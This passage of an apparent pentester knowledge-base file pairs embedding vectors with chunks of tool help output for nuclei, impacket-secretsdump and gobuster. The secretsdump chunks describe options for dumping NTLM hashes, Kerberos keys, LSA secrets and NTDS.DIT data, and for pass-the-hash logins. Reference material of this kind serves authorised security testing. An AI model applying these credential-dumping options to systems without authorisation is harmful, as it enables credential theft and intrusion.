-0.04245, -0.01113, -0.06341, 0.02747, 0.02517, -0.04521, -0.01059, -0.14084, -0.0346, -0.00189, 0.08295, -0.00871, 0.10461, -0.14134, -0.03702, 0.04215, -0.08478, -0.00115, -0.02197, -0.09896, -0.07724, -0.01236, 0.11809, -0.0731, 0.11578, -0.10147, 0.04589, -0.12529, 0.05683, 0.05959, -0.01529, 0.03213, 0.06522, -0.01607, -0.0969, -0.04615, -0.01572, -0.18787, 0.03493, -0.02109, -0.07601, 0.11977, -0.02607, 0.08534, 0.00693, -0.07237, 0.10165, -0.04291, -0.04165, -0.01315, 0.01781, -0.03359, -0.0016, -0.13715, -0.00117, 0.01252, -0.02276, 0.02523, -0.11186, 0.03859, -0.05806, 0.0001, -0.07116, 0.0447, 0.03688, 0.00637, -0.07016, -0.08453, 0.03579, -0.10877, -0.02883, 0.01614, -0.00834, -0.05991, 0.01477, 0.04682, -0.04925, 0.00142, 0.08998, 0.01951, 0.01068, 0.0511, -0.03053, -0.01335, -0.00599, 0.01459, -0.02968, -0.06389, 0.1499, 0.10274, 0.0647, -0.01033, 0.00222, -0.00162, 0.01474, 0.06093, -0.03284, -0.04565, -0.05144, -0.03932, -0.05777, -0.01626, -0.0107, -0.01591, -0.06777, -0.06482, -0.04923, 0.0001, 0.03845, -0.06171, -0.06652, -0.03145, 0.09063, 0.02324, 0.02795, -0.03167, 0.04959, -0.06366, 0.02915, -0.06485, 0.06279, 0.00312, -0.05916, 0.00072, -0.05769, 0.04309, 0.01433, -0.0081, 0.00738, 0.08506, -0.06637, -0.00607, -0.04518, -0.01697, 0.04906, 0.02338, 0.00467, 0.02088, 0.03383, -0.04729, -0.04349, 0.0337, -0.0584, 0.02019, 0.00462, -0.00949, 0.0131, -0.0333, 0.09808, -0.00676, 0.02236, 0.01949, -0.03219, 0.05164, -0.03253, -0.03293, 0.07232, -0.04885, -0.11203, 0.01381, -0.06948, 0.07415, -0.02927, 0.07347, -0.04679, 0.00293, 0.01358, 0.04523, 0.04242, -0.00867, -0.06955, -0.01777, -0.02266, -0.01068, -0.03463, 0.00905, 0.07673, -0.04122, 0.00205, 0.04992, -0.00966, -0.05944, -0.07697, 0.04287, -0.01659, -0.01791, 0.00809, 0.04307, -0.0548, -0.03771, 0.0037, -0.04569, 0.0317, -0.04365, 0.00411, 0.07403, -0.03936, 0.05535, 0.0003, -0.07873, 0.03022, 0.00837, -0.00662, -0.00127, -0.03044, 0.00027, 0.05572, 0.06573, -0.01158, 0.0227, 0.00925, 0.04309, 0.01038, 0.06972, -0.00258, -0.02155, 0.08934, -0.00048, 0.00671, 0.06841, 0.00785, 0.01113, -0.01122, -0.03478, -0.05788, 0.03719, 0.04742, 0.01397, -0.0187, -0.02726, -0.05485, -0.04687, 0.04605, 0.06807, -0.0439, -0.02784, -0.00749, 0.02349, -0.05862, 0.02288, -0.02814]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "Run nuclei with sorted Markdown outputs (with environment variables):\n\t$ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/\n\nAdditional documentation is available at: https://docs.nuclei.sh/getting-started/running\n```", "v": [0.07015, -0.03196, -0.06031, -0.25735, 0.09673, -0.0947, -0.08377, -0.0341, -0.00531, 0.06246, -0.1562, -0.26228, 0.07635, -0.07908, -0.1015, -0.04988, -0.03429, -0.10573, -0.0369, 0.09901, -0.05119, -0.12704, -0.09293, -0.00706, 0.07705, 0.10682, -0.10808, 0.10732, -0.01736, 0.05564, 0.02012, -0.00878, 0.03125, -0.12607, -0.05531, -0.09266, -0.00846, -0.04779, 0.06056, 0.09793, -0.0733, -0.03948, -0.10056, -0.05515, 0.1561, -0.00236, 0.03989, 0.00151, 0.07743, -0.09058, 0.08668, 0.00865, -0.10418, 0.07343, 0.05395, 0.02088, 0.13468, 0.0531, 0.05233, 0.00088, -0.05608, 0.04882, -0.02498, -0.19736, 0.10637, 0.00165, 0.00933, -0.02151, -0.07699, 0.01759, -0.03946, -0.05435, 0.01662, -0.14482, -0.00712, -0.04171, 0.04377, 0.00908, 0.01333, 0.14512, -0.06537, -0.04231, -0.04918, 0.03879, -0.08178, -0.03143, 0.0468, 0.01089, -0.03607, -0.06014, 0.04714, -0.08811, -0.01355, 0.07686, 0.00627, -0.01572, -0.06941, 0.01135, 0.02101, 0.04031, -0.04641, -0.0042, -0.05289, 0.12567, 0.03299, -0.00872, 0.00505, -0.04657, -0.00774, 0.10783, 0.0378, -0.05337, 0.00311, -0.05602, -0.01695, 0.03957, -0.01381, 0.06133, -0.03757, -0.07871, -0.0019, -0.01629, -0.01802, -0.01902, -0.09228, -0.06627, -0.05183, 0.04245, 0.09532, 0.04378, 0.00749, 0.08633, -0.00065, -0.00792, -0.07229, 0.05587, 0.01308, -0.08637, 0.00527, -0.14432, 0.07627, -0.09619, 0.04594, 0.12796, -0.01928, -0.01244, 0.0005, -0.01561, -0.05141, 0.06536, 0.07928, -0.05122, -0.0194, -0.00826, -0.09709, -0.11046, 0.00866, -0.00295, 0.02529, 0.01167, -0.03929, 0.02848, -0.03702, 0.00682, 0.03407, 0.06357, 0.07864, -0.01975, -0.03621, -0.02369, -0.03218, -0.00437, -0.06343, -0.09133, 0.03427, -0.04847, 0.05479, -0.06932, 0.00775, 0.0283, 0.02294, -0.01173, -0.00049, 0.05364, -0.07109, -0.00974, -0.00795, 0.02657, 0.01246, -0.03852, -0.01003, 0.10266, -0.00895, -0.01194, 0.05515, -0.01983, -0.0262, -0.02412, 0.01548, -0.01913, -0.01794, 0.06255, 0.10984, -0.02286, 0.00333, 0.05294, -0.07936, 0.02244, -0.02708, -0.01047, 0.02828, -0.02792, 0.00641, 0.05593, -0.10919, 0.03543, -0.01167, 0.05926, 0.02319, -0.04716, 0.0003, 0.05768, 0.00915, 0.00406, -0.00298, 0.04453, 0.02165, -0.0225, 0.05117, -0.01528, 0.00519, 0.03205, 0.02293, 0.02306, -0.01311, 0.00244, -0.04313, -0.03309, -0.03415, -0.01353, -0.01124, 0.02082, 0.00288, -0.03299, -0.0502, 0.02704, -0.0109, 0.04194, 0.09864, 0.03071, 0.01641, -0.04376, 0.01576, -0.03977, 0.00326, 0.00772]} +{"tipo": "metodologia", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "texto": "# impacket-secretsdump — manual\n\nSalida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]\n [-security SECURITY] [-sam SAM] [-ntds NTDS]\n [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]\n [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]\n [-use-keylist]\n [-exec-method [{smbexec,wmiexec,mmcexec}]]\n [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]\n [-pwd-last-set] [-user-status] [-history]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k]\n [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]\n [-target-ip ip address]\n target\n\nPerforms various techniques to dump secrets from the remote machine without\nexecuting any agent there.", "v": [-0.10695, -0.21744, -0.17655, -0.1305, 0.12548, -0.21862, -0.13103, 0.06188, -0.01887, 0.20473, -0.11542, -0.07307, -0.04001, -0.17987, -0.02133, 0.02327, -0.03562, -0.07305, -0.04375, -0.00547, 0.07818, 0.01821, -0.113, 0.0542, 0.03461, 0.1761, -0.03223, 0.09726, -0.15836, -0.06474, 0.08456, -0.02762, -0.06327, -0.08562, -0.06636, -0.1016, -0.01528, 0.03998, -0.02169, 0.17506, -0.03669, -0.01731, -0.14851, 0.14182, 0.09588, -0.02747, 0.01183, -0.05227, 0.0294, -0.14109, -0.09962, -0.04056, -0.1629, -0.05524, 0.02505, -0.05932, 0.11901, 0.01862, -0.02848, 0.04032, -0.04861, 0.06194, -0.01455, -0.06886, 0.06056, -0.02936, 0.04394, -0.13226, -0.04572, 0.05531, -0.07274, -0.01924, 0.05289, 0.01308, 0.04482, -0.0269, 0.00878, -0.05934, 0.05508, 0.05651, -0.0719, -0.0613, -0.1009, -0.03464, -0.02765, -0.08383, 0.10375, -0.0159, -0.04292, -0.08585, 0.12513, -0.01507, -0.00944, 0.05155, 0.0777, -0.10807, 0.00372, 0.0299, 0.03965, -0.07547, 0.02602, 0.04542, -0.05763, 0.11563, -0.00311, 0.02029, 0.03545, 0.01454, 0.02829, 0.01646, 0.00631, -0.02241, 0.03609, 0.00169, -0.00979, -0.05938, -0.04896, -0.01014, 0.0158, -0.05153, -0.06037, -0.03693, -0.01391, -0.00769, -0.02953, -0.04598, -0.01382, 0.05269, 0.00765, -0.07025, 0.02529, -0.06379, -0.01833, 0.02832, 0.04633, 0.07963, 0.02695, 0.00982, -0.03326, -0.03674, 0.04462, 0.00586, -0.0087, 0.03326, 0.10966, 0.04082, 0.06739, -0.06569, -0.07848, 0.02924, 0.05791, 0.018, -0.01301, 0.00444, -0.00676, 0.02598, 0.01353, -0.04864, -0.04172, 0.02663, -0.04375, 0.03855, 0.00695, 0.02654, 0.00709, -0.00773, 0.0252, -0.0225, 0.02453, -0.0701, 0.01126, 0.03114, -0.00192, -0.01029, 0.00184, -0.1004, 0.02747, -0.05427, -0.00558, -0.06337, 0.00812, -0.01, 0.04658, 0.03697, 0.01453, -0.04466, -0.01043, -0.04937, 0.01871, -0.01622, 0.01787, 0.03596, -0.02948, -0.00232, 0.0056, -0.01173, -0.04292, -0.04953, 0.00887, -0.01893, -0.05285, 0.00392, -0.00754, -0.02133, 0.02955, 0.01137, -0.02395, 0.04096, -0.06779, 0.00865, 0.06102, -0.03574, 0.03502, -0.03461, -0.04855, -0.01885, 0.01248, 0.02287, -0.03341, -0.01409, -0.00586, 0.0936, 0.0734, -0.01507, 0.00481, 0.01453, 0.05479, 0.02362, 0.08986, -0.02512, -0.02556, 0.06366, -0.02938, -0.06938, 0.05958, 0.00041, -0.03249, 0.00774, -0.03348, -0.05355, 0.03156, 0.02085, -0.00494, -0.06763, -0.02014, -0.0767, -0.06688, 0.02999, 0.02095, -0.01969, -0.01685, -0.02395, -0.00837, -0.05088, 0.01224, -0.04179]} +{"tipo": "metodologia", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "texto": "positional arguments:\n target [[domain/]username[:password]@]\n or LOCAL (if you want to parse local files)", "v": [0.05424, 0.12454, -0.09232, -0.32382, 0.04939, -0.13074, 0.0646, -0.0671, -0.07017, 0.11121, -0.00314, -0.0747, -0.03321, -0.08818, 0.00149, -0.08677, 0.13268, 0.00857, -0.02016, 0.04997, -0.01575, 0.02821, -0.09575, 0.07508, -0.03629, -0.0721, 0.08003, -0.02652, -0.13686, 0.01682, 0.04239, -0.02252, -0.02748, -0.02742, 0.00426, -0.01201, 0.00164, 0.13039, -0.06738, 0.0972, 0.00565, 0.00499, -0.19538, 0.15751, -0.02443, 0.07063, -0.05559, -0.00497, 0.01747, -0.09627, -0.06035, -0.00835, -0.08756, -0.04118, 0.11093, 0.00515, 0.16258, -0.08082, -0.01311, -0.00629, -0.12871, -0.04213, 0.03415, 0.03974, 0.03436, -0.0602, 0.07805, 0.00671, -0.0944, -0.02764, -0.02795, 0.0002, -0.00027, -0.06361, 0.09028, 0.01631, 0.1071, -0.00661, 0.09231, -0.00484, -0.02383, -0.09074, -0.12667, 0.00196, -0.06595, -0.00972, 0.04828, -0.10156, -0.0874, -0.09461, 0.17178, -0.02267, -0.00598, 0.05089, -0.03123, -0.12156, -0.0066, -0.00012, -0.06916, -0.06012, -0.04495, 0.00658, -0.0576, 0.09228, 0.09261, -0.0258, -0.01781, -0.04288, 0.03157, -0.04166, 0.00568, -0.02561, -0.0084, -0.04003, -0.04627, -0.06418, -0.06338, 0.00986, 0.09212, 0.01425, -0.07977, -0.05426, -0.02166, -0.01695, -0.0843, 0.03958, -0.03152, 0.01867, -0.05956, -0.05602, -0.01152, 0.02177, 0.04465, -0.01997, -0.05533, 0.10998, 0.10592, -0.08075, -0.0076, 0.01358, 0.02721, -0.03376, 0.01295, 0.02409, 0.03704, 0.03086, 0.03504, -0.09878, -0.1062, -0.00895, -0.01807, -0.0404, -0.0371, -0.00851, -0.03371, 0.06406, 0.03644, -0.03148, -0.0181, 0.07398, -0.01526, -0.03689, -0.0056, 0.02664, -0.0509, -0.11751, -0.02089, 0.0021, 0.11635, -0.01554, 0.00096, 0.09601, -0.0804, -0.02745, 0.06917, -0.0349, 0.09635, -0.02337, 0.03087, -0.00606, 0.06053, 0.00619, 0.04034, 0.08525, -0.04208, -0.004, 0.07391, -0.06376, -0.01285, 0.03642, 0.01881, -0.02859, -0.08778, 0.04971, -0.0442, -0.03309, -0.06153, -0.01642, 0.01599, -0.04626, -0.0323, -0.02155, -0.01986, 0.00681, -0.01171, 0.01365, -0.05687, -0.02912, -0.08382, -0.01357, -0.00796, -0.05505, 0.04633, -0.04233, -0.05808, 0.00635, 0.04031, -0.04382, -0.03085, 0.00643, -0.00775, 0.06111, 0.11155, -0.03277, -0.04229, 0.00641, 0.04651, 0.01111, 0.0714, 0.01425, -0.0346, 0.05801, -0.0203, -0.03367, 0.08617, -0.01829, 0.01377, 0.00344, -0.02056, -0.01522, 0.03391, 0.04001, 0.00993, -0.03796, -0.07748, -0.04714, -0.09347, 0.02113, 0.00064, -0.01059, -0.06079, 0.00374, 0.02527, 0.00818, 0.02879, -0.02056]} +{"tipo": "metodologia", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n -use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "v": [-0.11407, -0.15858, -0.24761, -0.22014, 0.07587, -0.16848, -0.12306, 0.05115, -0.01193, 0.13432, -0.1847, -0.18152, -0.03311, -0.16729, 0.04899, -0.01836, 0.00444, -0.08008, -0.05925, 0.00166, 0.0565, -0.06221, -0.0505, 0.06631, 0.11631, 0.1299, -0.05705, 0.05763, -0.13474, -0.01799, 0.09901, -0.00836, 0.00699, -0.06676, -0.07016, -0.12617, -0.03679, 0.03003, -0.01775, 0.1268, 0.00492, 0.00662, -0.16458, 0.16208, 0.07181, -0.06859, 0.04594, -0.05754, 0.06423, -0.073, -0.11487, 0.03006, -0.18945, -0.07569, 0.02019, -0.05973, 0.05137, -0.05935, -0.07836, 0.01017, -0.10987, -0.01801, -0.01164, -0.16264, 0.04095, -0.07457, 0.08456, -0.04745, -0.04565, 0.10712, -0.07627, -0.00691, 0.06781, -0.02409, -0.00236, 9e-05, 0.01013, -0.04919, 0.1001, 0.05148, -0.05127, -0.07423, -0.05887, 0.01028, -0.05853, -0.03937, 0.026, -0.05055, -0.01597, -0.08359, 0.12226, -0.03047, 0.04439, 0.05267, 0.05378, -0.13085, 0.02333, 0.0277, -0.02541, -0.08945, 0.02738, -0.00352, -0.01911, 0.08665, -0.01961, -0.00615, 0.06129, -0.00431, 0.02597, -0.01817, -0.00282, -0.00237, 0.0213, -0.01369, -0.03656, -0.09105, 0.0119, -0.00476, -0.067, -0.03744, -0.03924, -0.04059, -0.00208, -0.05124, -0.01958, -0.05109, -0.01886, 0.0507, -0.02175, -0.01351, 0.02525, -0.05266, 0.02062, -0.00449, 0.0052, 0.07496, 0.04705, 0.02584, -0.04903, -0.0572, -0.01173, 0.06746, 0.02407, 0.02832, 0.08279, -0.04178, 0.03359, -0.02857, -0.04388, -0.00413, 0.0546, -0.00158, 0.00029, -0.03704, -0.03637, -0.00858, 0.01746, 0.02227, -0.0455, -0.01371, -0.02439, 0.02629, 0.00634, 0.05873, 0.02316, -0.04482, 0.04657, -0.0384, 0.0261, -0.03875, 0.02502, 0.07141, -0.00018, -0.0486, 0.00927, -0.08698, 0.04177, -0.05884, 0.01048, -0.00355, 0.01279, -0.02548, 0.05224, 0.01489, 0.05988, -0.03291, -0.02041, -0.0341, 0.02137, -0.01293, -0.01465, 0.07353, -0.04279, -0.03063, 0.01338, -0.02086, -0.02596, -0.06336, 0.0542, -5e-05, -0.03279, 0.02381, 0.02582, -0.05362, 0.02808, 0.02992, -0.06496, 0.06516, -0.0676, 0.02025, 0.05787, -0.02091, 0.053, -0.03206, -0.03064, 0.0001, -0.03139, 0.01793, -0.01115, -0.00606, -0.02887, 0.07332, 0.07087, 0.01598, -0.01132, 0.00438, 0.05731, 0.00698, 0.04749, -0.02235, -0.01692, 0.03751, -0.03006, -0.01803, 0.05229, 0.02056, -0.04912, 0.00684, -0.0361, -0.01985, 0.03642, 0.00815, 0.00015, 0.00253, -0.01257, -0.05216, -0.07365, 0.00762, 0.04664, -0.0133, 0.01025, -0.05583, -0.01159, -0.04614, 0.00315, -0.03158]} +{"tipo": "metodologia", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "v": [-0.07844, -0.10202, -0.09522, -0.10504, 0.05817, -0.02388, -0.10547, 0.06812, -0.10382, 0.26193, -0.01494, -0.20167, -0.12225, -0.22449, -0.14347, -0.16262, 0.10297, -0.11723, 0.03598, -0.08004, -0.05736, -0.08387, -0.06977, -0.07055, 0.0234, 0.00557, -0.05511, 0.03307, -0.12846, 0.16371, 0.03377, 0.00493, -0.1422, -0.05454, 0.00104, -0.04999, -0.0469, 0.05872, 0.07491, 0.12476, 0.1082, 0.18133, -0.06137, 0.17567, 0.10534, -0.03643, -0.06668, 0.03225, 0.05055, -0.14637, -0.09702, 0.1321, -0.13577, -0.03902, 0.05965, -0.08817, 0.10442, -0.01489, -0.01222, 0.03592, -0.0783, 0.02487, -0.07309, -0.07658, -0.00998, -0.14246, 0.06, -0.0183, -0.00769, 0.06724, -0.12419, -0.01702, 0.06616, -0.06237, 0.0272, -0.01312, -0.01537, -0.01177, 0.05689, 0.09655, -0.03362, -0.03684, -0.05419, -0.00185, -0.0735, -0.0497, 0.02588, -0.03386, -0.02523, -0.03509, 0.14099, -0.00579, 0.01093, 0.00146, 0.09855, -0.10409, -0.02788, 0.04955, -0.03082, -0.05083, 0.03221, 0.02397, 0.01586, 0.08566, -0.08018, 0.01454, 0.07656, 0.02508, -0.01704, -0.01243, 0.07915, -0.01426, -0.02992, 0.02213, 0.02457, 0.05551, -0.02265, -0.02613, 0.00441, 0.011, 0.00445, -0.02108, 0.04605, -0.00518, -0.01557, 0.00321, -0.00089, 0.02757, -0.0296, -0.00602, 0.00807, -0.031, -0.01102, -0.01137, 0.02655, 0.02991, -0.01869, 0.01083, -0.06023, -0.04092, 0.04767, 0.03417, 0.00179, 0.04782, 0.08893, -0.02073, 0.0077, -0.01582, -0.01186, 0.02941, 0.07554, -0.00887, -0.0021, -0.01152, -0.03177, -0.00659, 0.05641, 0.0044, -0.04309, 0.03961, -0.02649, 0.02493, 0.00287, 0.07245, 0.01047, -0.04405, 0.01945, -0.05327, 0.03551, -0.06406, -0.01521, 0.01889, 0.00681, -0.02654, -0.00531, -0.04923, 0.05006, -0.08271, 0.01145, -0.07083, 0.03641, -0.00768, 0.07528, -0.0029, 0.00903, -0.07856, -0.02084, -0.06103, -0.00953, -0.08425, 0.0104, 0.08841, -0.00099, -0.02948, 0.01026, -0.01388, -0.01885, -0.04994, 0.03385, 0.00092, -0.0574, 0.02399, 0.01258, -0.0541, -0.00635, 0.04207, -0.02154, 0.06796, -0.04985, 0.00318, 0.0709, -0.03358, 0.02946, -0.02415, -0.07518, -0.03547, 0.01389, 0.0211, -0.01748, 0.01385, -0.0335, 0.05738, 0.01122, 0.00366, 0.02846, -0.03271, 0.05042, 0.01504, 0.03897, 0.00544, 0.01603, 0.05165, -0.0139, 0.00475, 0.04055, 0.02068, -0.03232, 0.01084, -0.01254, -0.03601, 0.04417, 0.01245, 0.01282, -0.01481, 0.01464, -0.03974, -0.03567, 0.02577, 0.03132, -0.01767, 0.0323, -0.06819, -0.02521, -0.01316, -0.02185, -0.00988]} +{"tipo": "metodologia", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "v": [-0.10039, -0.06728, -0.12122, -0.21297, 0.12575, -0.26882, -0.05409, 0.06063, -0.13237, 0.17906, -0.03358, -0.11608, -0.03039, -0.07504, 0.0309, 0.06189, 0.00599, -0.07178, 0.03748, -0.01778, -0.00073, 0.05872, -0.17637, 0.051, -0.06425, 0.08453, -0.03875, 0.08016, -0.1998, 0.0036, -0.02332, -0.13199, -0.06702, 0.03066, -0.09626, -0.0202, -0.02812, 0.14114, 0.02038, 0.16317, 0.02973, 0.04328, -0.0771, 0.10696, 0.08591, 0.01825, -0.01002, -0.02356, 0.01959, -0.12655, -0.04078, -0.1082, -0.14518, -0.07721, -0.0218, -0.02031, 0.14458, -0.04425, -0.07053, 0.01059, -0.17947, -0.07953, -0.02539, -0.02347, -0.03999, -0.1533, 0.01686, 0.01318, -0.12063, 0.01311, -0.0374, 0.03281, -0.02183, 0.06074, 0.081, -0.00675, 0.0872, -0.07853, 0.11759, 0.06421, 0.00491, -0.04168, -0.14398, -0.06389, -0.09577, -0.02847, 0.07157, -0.10413, 0.0115, -0.07281, 0.08952, 0.04184, 0.0114, -0.00869, 0.0444, -0.09339, -0.08516, 0.01088, -0.04002, -0.07189, -0.00964, 0.06004, -0.11373, 0.15388, 0.0356, 0.02312, 0.05077, 0.02086, 0.03618, 0.00848, 0.01121, 0.01359, -0.04724, -0.0562, -0.017, -0.04263, -0.02544, -0.03019, 0.01804, -0.03208, -0.08502, -0.05242, 0.02356, 0.00222, -0.01373, 0.04648, -0.0208, 0.04945, -0.02831, -0.03993, 0.01191, -0.00613, -0.00616, 0.00676, -0.00918, 0.11095, 0.03089, -0.07807, -0.02591, 0.01928, 0.0331, -0.01145, 0.00303, 0.03793, 0.04905, 0.00274, 0.02663, -0.03158, -0.08674, 0.0173, -0.02023, 0.02329, -0.00341, -0.02507, -0.06398, 0.01916, -0.03091, -0.00655, -0.06097, 0.03819, -0.02013, 0.01624, -0.01652, 0.05261, 0.00886, -0.0147, 0.00297, -0.01965, 0.08574, 0.01138, 0.01247, 0.03917, -0.01812, -0.02649, 0.00848, -0.04572, 0.03595, -0.01593, 0.01676, -0.04555, 0.05034, -0.0593, 0.06949, 0.05166, 0.02693, 0.03295, 0.05416, -0.03239, 0.0119, 0.01426, 0.01716, 0.0317, -0.05393, 0.0103, 0.029, -0.02791, -0.03116, -0.03303, 0.01439, -0.03562, -0.0517, 0.00306, -0.00993, -0.02916, 0.04368, 0.01586, -0.0564, -0.02914, -0.03807, -0.01768, 0.00345, -0.03673, -0.00469, -0.04555, -0.08851, -0.02184, 0.01262, 0.03955, -0.01736, -0.0319, -0.04685, 0.07827, 0.06124, -0.01602, 0.01947, -0.00617, 0.03328, -0.00148, 0.02799, -0.01294, -0.04062, 0.04758, -0.01423, -0.02516, 0.05094, -0.04633, -0.02555, 0.01972, -0.018, -0.01209, 0.00576, 0.01588, 0.017, -0.00067, -0.01112, -0.02977, -0.08544, 0.00868, -0.02894, 0.01209, -0.02894, -0.04834, -0.00493, -0.01438, -0.0264, -0.01352]} +{"tipo": "metodologia", "herramienta": "gobuster", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/gobuster.md", "texto": "# gobuster — manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "v": [0.04292, -0.05711, -0.17119, -0.29889, 0.0095, -0.0915, -0.08075, -0.10417, 0.00507, 0.01952, -0.24522, -0.14083, -0.15614, -0.02961, -0.06263, -0.05953, 0.03434, -0.11247, 0.00699, -0.08005, 0.01927, 0.02735, -0.09306, 0.02195, -0.01083, 0.11285, 0.02351, -0.03237, -0.1671, -0.06002, 0.05738, -0.09461, -0.04039, -0.04555, -0.18789, -0.06092, -0.00393, 0.00356, -0.02376, 0.19617, -0.02918, 0.0857, -0.15735, 0.11298, 0.04081, -0.02371, 0.04016, -0.04346, 0.0571, -0.05811, 0.01739, -0.08232, -0.12052, 0.04992, 0.02257, -0.02893, 0.13116, -0.14729, -0.08376, 0.03811, -0.0797, -0.1044, -0.01311, 0.00155, 0.00615, -0.04559, -0.03163, -0.10002, -0.12113, 0.01833, -0.07931, 0.01071, 0.04721, -0.03383, 0.10113, -0.05124, 0.04739, -0.02208, 0.14234, 0.08832, -0.02436, -0.07578, -0.11056, 0.00243, -0.06109, -0.06155, 0.01215, -0.08649, 0.0061, -0.10118, 0.12903, 0.02162, 0.02702, 0.02452, 0.07022, -0.06103, -0.04321, 0.02215, 0.04775, -0.05988, 0.0495, -0.00939, -0.08335, 0.12934, 0.02619, -0.03726, 0.08757, -0.01514, 0.01344, 0.02029, 0.09018, 0.0054, 0.01285, -0.00984, -0.01519, -0.04536, -0.0287, -0.00585, -0.00133, -0.05632, -0.04001, -0.0751, 3e-05, -0.00233, 0.0209, -0.00302, -0.03077, 0.02886, 0.02011, -0.07837, 0.01652, -0.0172, 0.02051, -0.07256, -0.04482, 0.06992, 0.02687, -7e-05, -0.00111, -0.06453, 0.01257, 0.05358, -0.02891, 0.06377, 0.06222, -0.04465, 0.06914, -0.05949, 0.01456, -0.02058, 0.04519, 0.07996, -0.00858, -0.03762, 0.03054, -0.0203, 0.05321, 4e-05, -0.01633, 0.00064, 0.01413, -0.0475, -0.01343, -0.01659, 0.04132, -0.03305, 0.05538, 0.05097, -0.04926, -0.04487, 0.06518, -0.00313, -0.02456, -0.0292, 0.00904, -0.0313, 0.04717, -0.00999, -0.00265, -0.01024, 0.04992, 0.00997, -0.02859, 0.04226, 0.03735, -0.06534, 0.02236, -0.02826, -0.02937, -0.01703, -0.00745, 0.06718, -0.00868, -0.01858, 0.01051, 0.03795, 0.0233, -0.02992, -0.01576, -0.0165, -0.07215, 0.01064, 0.016, -0.0853, 0.0119, 0.04893, -0.06469, 0.03145, -0.01767, -0.07723, -0.02547, -0.06508, 0.00051, 0.02434, 0.01231, -0.00826, -0.03366, 0.01689, -0.05002, -0.10031, -0.03103, 0.05044, 0.02522, 0.01535, -0.01485, -0.00272, 0.01674, -0.04059, 0.02542, -0.01829, 0.00373, -0.00459, 0.00661, -0.03392, 0.00331, -0.01849, -0.01162, 0.07511, 0.00882, 0.00078, -0.00046, 0.0228, 0.05301, 0.02006, -0.00144, -0.07475, -0.05366, -0.04273, 0.0091, 0.01981, -0.00605, -0.0409, -0.05416, -0.06214, -0.05884, -0.01018]} +{"tipo": "metodologia", "herramienta": "gobuster", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/gobuster.md", "texto": "Flags:\n --delay duration Time each thread waits between requests (e.g. 1500ms)\n -h, --help help for gobuster\n --no-color Disable color output\n --no-error Don't display errors\n -z, --no-progress Don't display progress\n -o, --output string Output 